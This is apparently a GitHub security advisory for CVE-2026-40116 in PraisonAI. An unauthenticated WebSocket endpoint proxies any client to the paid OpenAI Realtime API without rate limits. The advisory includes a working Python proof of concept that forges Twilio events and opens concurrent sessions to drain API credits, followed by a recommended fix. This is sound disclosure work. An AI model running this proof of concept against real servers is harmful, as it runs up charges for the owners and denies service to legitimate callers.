GHSA-Q5R4-47M9-5MC7
Vulnerability from github – Published: 2026-04-10 19:22 – Updated: 2026-04-10 19:22
VLAI?
Summary
PraisonAI: Unauthenticated WebSocket Endpoint Proxies to Paid OpenAI Realtime API Without Rate Limits
Details
Summary
The /media-stream WebSocket endpoint in PraisonAI's call module accepts connections from any client without authentication or Twilio signature validation. Each connection opens an authenticated session to OpenAI's Realtime API using the server's API key. There are no limits on concurrent connections, message rate, or message size, allowing an unauthenticated attacker to exhaust server resources and drain the victim's OpenAI API credits.
Details
The vulnerability exists in src/praisonai/praisonai/api/call.py. The FastAPI application defines a WebSocket endpoint at line 108 with no authentication middleware, no Twilio request signature validation, and no rate limiting:
# line 108-112 — no auth, no middleware, accepts any WebSocket client
@app.websocket("/media-stream")
async def handle_media_stream(websocket: WebSocket):
"""Handle WebSocket connections between Twilio and OpenAI."""
print("Client connected")
await websocket.accept()
Immediately upon connection, the handler opens an authenticated session to OpenAI's paid Realtime API using the server's OPENAI_API_KEY:
# line 114-120 — each unauthenticated connection spawns a paid API session
async with websockets.connect(
'wss://api.openai.com/v1/realtime?model=gpt-4o-realtime-preview-2024-10-01',
extra_headers={
"Authorization": f"Bearer {OPENAI_API_KEY}",
"OpenAI-Beta": "realtime=v1"
}
) as openai_ws:
The receive_from_twilio() coroutine then reads unlimited messages and forwards them directly to OpenAI:
# line 128-135 — unbounded message ingestion, no size/rate check
async for message in websocket.iter_text():
data = json.loads(message)
if data['event'] == 'media' and openai_ws.open:
audio_append = {
"type": "input_audio_buffer.append",
"audio": data['media']['payload']
}
await openai_ws.send(json.dumps(audio_append))
The server binds to 0.0.0.0 (line 273) and can be exposed to the internet via ngrok (--public flag). Twilio's RequestValidator is never used — the endpoint was designed to receive Twilio media streams but performs no verification that the connecting client is actually Twilio. The standard mitigation for Twilio WebSocket endpoints is to validate the X-Twilio-Signature header, which is absent here.
Additionally, uvicorn.run() is called without a ws_max_size parameter (line 273), defaulting to 16MB per WebSocket message. Combined with no connection limit, this allows substantial memory consumption.
PoC
# Step 1: Verify the endpoint is accessible and accepts connections
python3 -c "
import asyncio
import websockets
import json
async def test():
async with websockets.connect('ws://TARGET:8090/media-stream') as ws:
# Send a start event (mimicking Twilio)
await ws.send(json.dumps({
'event': 'start',
'start': {'streamSid': 'attacker-session-1'}
}))
# Send a media event — this gets forwarded to OpenAI Realtime API
await ws.send(json.dumps({
'event': 'media',
'media': {'payload': 'SGVsbG8gV29ybGQ='}
}))
# Receive the OpenAI response routed back
response = await asyncio.wait_for(ws.recv(), timeout=10)
print('Received response (confirms OpenAI session active):', response[:200])
asyncio.run(test())
"
# Step 2: Demonstrate resource exhaustion — open multiple concurrent connections
# Each connection spawns an OpenAI Realtime API session billed to the server owner
python3 -c "
import asyncio
import websockets
import json
import base64
async def open_session(i):
uri = 'ws://TARGET:8090/media-stream'
async with websockets.connect(uri) as ws:
await ws.send(json.dumps({
'event': 'start',
'start': {'streamSid': f'attacker-{i}'}
}))
# Send audio data to keep the OpenAI session active and billing
payload = base64.b64encode(b'\\x00' * 8000).decode() # ~8KB audio chunk
for _ in range(100):
await ws.send(json.dumps({
'event': 'media',
'media': {'payload': payload}
}))
await asyncio.sleep(0.01)
print(f'Session {i}: sent 100 audio chunks to OpenAI via proxy')
async def main():
# Open 10 concurrent sessions (each consuming OpenAI Realtime API credits)
await asyncio.gather(*[open_session(i) for i in range(10)])
asyncio.run(main())
"
Replace TARGET with the server's hostname/IP. Each connection in Step 2 opens a separate authenticated OpenAI Realtime API session. The server logs will show "Client connected" and "Incoming stream has started" for each attacker session.
Impact
-
OpenAI API credit drain: Each unauthenticated WebSocket connection opens a billed OpenAI Realtime API session. An attacker can open many concurrent sessions and stream audio data, accumulating charges on the victim's OpenAI account. The Realtime API bills per-second of audio, making this financially impactful.
-
Denial of service: Legitimate Twilio callers are denied service when the server's resources (memory, file descriptors, OpenAI API rate limits) are exhausted by attacker connections.
-
Server memory exhaustion: With no per-message size limit (16MB default) and no connection limit, an attacker can consume server memory by opening many connections and sending large payloads.
Recommended Fix
Add Twilio signature validation, connection limits, and rate limiting:
from twilio.request_validator import RequestValidator
from starlette.websockets import WebSocketState
import time
# Connection tracking
MAX_CONCURRENT_CONNECTIONS = 20
active_connections = 0
connection_lock = asyncio.Lock()
TWILIO_AUTH_TOKEN = os.getenv('TWILIO_AUTH_TOKEN')
@app.websocket("/media-stream")
async def handle_media_stream(websocket: WebSocket):
global active_connections
# Enforce connection limit
async with connection_lock:
if active_connections >= MAX_CONCURRENT_CONNECTIONS:
await websocket.close(code=1008, reason="Too many connections")
return
active_connections += 1
try:
# Validate Twilio signature if auth token is configured
if TWILIO_AUTH_TOKEN:
validator = RequestValidator(TWILIO_AUTH_TOKEN)
url = str(websocket.url).replace("ws://", "http://").replace("wss://", "https://")
signature = websocket.headers.get("X-Twilio-Signature", "")
if not validator.validate(url, {}, signature):
await websocket.close(code=1008, reason="Invalid signature")
return
await websocket.accept()
# ... rest of handler ...
finally:
async with connection_lock:
active_connections -= 1
Additionally, pass ws_max_size to uvicorn to limit individual message sizes:
uvicorn.run(app, host="0.0.0.0", port=port, log_level="warning", ws_max_size=1_048_576) # 1MB
Severity ?
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "PraisonAI"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.128"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-40116"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-10T19:22:52Z",
"nvd_published_at": "2026-04-09T22:16:35Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe `/media-stream` WebSocket endpoint in PraisonAI\u0027s call module accepts connections from any client without authentication or Twilio signature validation. Each connection opens an authenticated session to OpenAI\u0027s Realtime API using the server\u0027s API key. There are no limits on concurrent connections, message rate, or message size, allowing an unauthenticated attacker to exhaust server resources and drain the victim\u0027s OpenAI API credits.\n\n## Details\n\nThe vulnerability exists in `src/praisonai/praisonai/api/call.py`. The FastAPI application defines a WebSocket endpoint at line 108 with no authentication middleware, no Twilio request signature validation, and no rate limiting:\n\n```python\n# line 108-112 \u2014 no auth, no middleware, accepts any WebSocket client\n@app.websocket(\"/media-stream\")\nasync def handle_media_stream(websocket: WebSocket):\n \"\"\"Handle WebSocket connections between Twilio and OpenAI.\"\"\"\n print(\"Client connected\")\n await websocket.accept()\n```\n\nImmediately upon connection, the handler opens an authenticated session to OpenAI\u0027s paid Realtime API using the server\u0027s `OPENAI_API_KEY`:\n\n```python\n# line 114-120 \u2014 each unauthenticated connection spawns a paid API session\n async with websockets.connect(\n \u0027wss://api.openai.com/v1/realtime?model=gpt-4o-realtime-preview-2024-10-01\u0027,\n extra_headers={\n \"Authorization\": f\"Bearer {OPENAI_API_KEY}\",\n \"OpenAI-Beta\": \"realtime=v1\"\n }\n ) as openai_ws:\n```\n\nThe `receive_from_twilio()` coroutine then reads unlimited messages and forwards them directly to OpenAI:\n\n```python\n# line 128-135 \u2014 unbounded message ingestion, no size/rate check\n async for message in websocket.iter_text():\n data = json.loads(message)\n if data[\u0027event\u0027] == \u0027media\u0027 and openai_ws.open:\n audio_append = {\n \"type\": \"input_audio_buffer.append\",\n \"audio\": data[\u0027media\u0027][\u0027payload\u0027]\n }\n await openai_ws.send(json.dumps(audio_append))\n```\n\nThe server binds to `0.0.0.0` (line 273) and can be exposed to the internet via ngrok (`--public` flag). Twilio\u0027s `RequestValidator` is never used \u2014 the endpoint was designed to receive Twilio media streams but performs no verification that the connecting client is actually Twilio. The standard mitigation for Twilio WebSocket endpoints is to validate the `X-Twilio-Signature` header, which is absent here.\n\nAdditionally, `uvicorn.run()` is called without a `ws_max_size` parameter (line 273), defaulting to 16MB per WebSocket message. Combined with no connection limit, this allows substantial memory consumption.\n\n## PoC\n\n```bash\n# Step 1: Verify the endpoint is accessible and accepts connections\npython3 -c \"\nimport asyncio\nimport websockets\nimport json\n\nasync def test():\n async with websockets.connect(\u0027ws://TARGET:8090/media-stream\u0027) as ws:\n # Send a start event (mimicking Twilio)\n await ws.send(json.dumps({\n \u0027event\u0027: \u0027start\u0027,\n \u0027start\u0027: {\u0027streamSid\u0027: \u0027attacker-session-1\u0027}\n }))\n # Send a media event \u2014 this gets forwarded to OpenAI Realtime API\n await ws.send(json.dumps({\n \u0027event\u0027: \u0027media\u0027,\n \u0027media\u0027: {\u0027payload\u0027: \u0027SGVsbG8gV29ybGQ=\u0027}\n }))\n # Receive the OpenAI response routed back\n response = await asyncio.wait_for(ws.recv(), timeout=10)\n print(\u0027Received response (confirms OpenAI session active):\u0027, response[:200])\n\nasyncio.run(test())\n\"\n\n# Step 2: Demonstrate resource exhaustion \u2014 open multiple concurrent connections\n# Each connection spawns an OpenAI Realtime API session billed to the server owner\npython3 -c \"\nimport asyncio\nimport websockets\nimport json\nimport base64\n\nasync def open_session(i):\n uri = \u0027ws://TARGET:8090/media-stream\u0027\n async with websockets.connect(uri) as ws:\n await ws.send(json.dumps({\n \u0027event\u0027: \u0027start\u0027,\n \u0027start\u0027: {\u0027streamSid\u0027: f\u0027attacker-{i}\u0027}\n }))\n # Send audio data to keep the OpenAI session active and billing\n payload = base64.b64encode(b\u0027\\\\x00\u0027 * 8000).decode() # ~8KB audio chunk\n for _ in range(100):\n await ws.send(json.dumps({\n \u0027event\u0027: \u0027media\u0027,\n \u0027media\u0027: {\u0027payload\u0027: payload}\n }))\n await asyncio.sleep(0.01)\n print(f\u0027Session {i}: sent 100 audio chunks to OpenAI via proxy\u0027)\n\nasync def main():\n # Open 10 concurrent sessions (each consuming OpenAI Realtime API credits)\n await asyncio.gather(*[open_session(i) for i in range(10)])\n\nasyncio.run(main())\n\"\n```\n\nReplace `TARGET` with the server\u0027s hostname/IP. Each connection in Step 2 opens a separate authenticated OpenAI Realtime API session. The server logs will show \"Client connected\" and \"Incoming stream has started\" for each attacker session.\n\n## Impact\n\n1. **OpenAI API credit drain**: Each unauthenticated WebSocket connection opens a billed OpenAI Realtime API session. An attacker can open many concurrent sessions and stream audio data, accumulating charges on the victim\u0027s OpenAI account. The Realtime API bills per-second of audio, making this financially impactful.\n\n2. **Denial of service**: Legitimate Twilio callers are denied service when the server\u0027s resources (memory, file descriptors, OpenAI API rate limits) are exhausted by attacker connections.\n\n3. **Server memory exhaustion**: With no per-message size limit (16MB default) and no connection limit, an attacker can consume server memory by opening many connections and sending large payloads.\n\n## Recommended Fix\n\nAdd Twilio signature validation, connection limits, and rate limiting:\n\n```python\nfrom twilio.request_validator import RequestValidator\nfrom starlette.websockets import WebSocketState\nimport time\n\n# Connection tracking\nMAX_CONCURRENT_CONNECTIONS = 20\nactive_connections = 0\nconnection_lock = asyncio.Lock()\n\nTWILIO_AUTH_TOKEN = os.getenv(\u0027TWILIO_AUTH_TOKEN\u0027)\n\n@app.websocket(\"/media-stream\")\nasync def handle_media_stream(websocket: WebSocket):\n global active_connections\n \n # Enforce connection limit\n async with connection_lock:\n if active_connections \u003e= MAX_CONCURRENT_CONNECTIONS:\n await websocket.close(code=1008, reason=\"Too many connections\")\n return\n active_connections += 1\n \n try:\n # Validate Twilio signature if auth token is configured\n if TWILIO_AUTH_TOKEN:\n validator = RequestValidator(TWILIO_AUTH_TOKEN)\n url = str(websocket.url).replace(\"ws://\", \"http://\").replace(\"wss://\", \"https://\")\n signature = websocket.headers.get(\"X-Twilio-Signature\", \"\")\n if not validator.validate(url, {}, signature):\n await websocket.close(code=1008, reason=\"Invalid signature\")\n return\n \n await websocket.accept()\n # ... rest of handler ...\n finally:\n async with connection_lock:\n active_connections -= 1\n```\n\nAdditionally, pass `ws_max_size` to uvicorn to limit individual message sizes:\n\n```python\nuvicorn.run(app, host=\"0.0.0.0\", port=port, log_level=\"warning\", ws_max_size=1_048_576) # 1MB\n```",
"id": "GHSA-q5r4-47m9-5mc7",
"modified": "2026-04-10T19:22:52Z",
"published": "2026-04-10T19:22:52Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-q5r4-47m9-5mc7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40116"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
},
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI: Unauthenticated WebSocket Endpoint Proxies to Paid OpenAI Realtime API Without Rate Limits"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…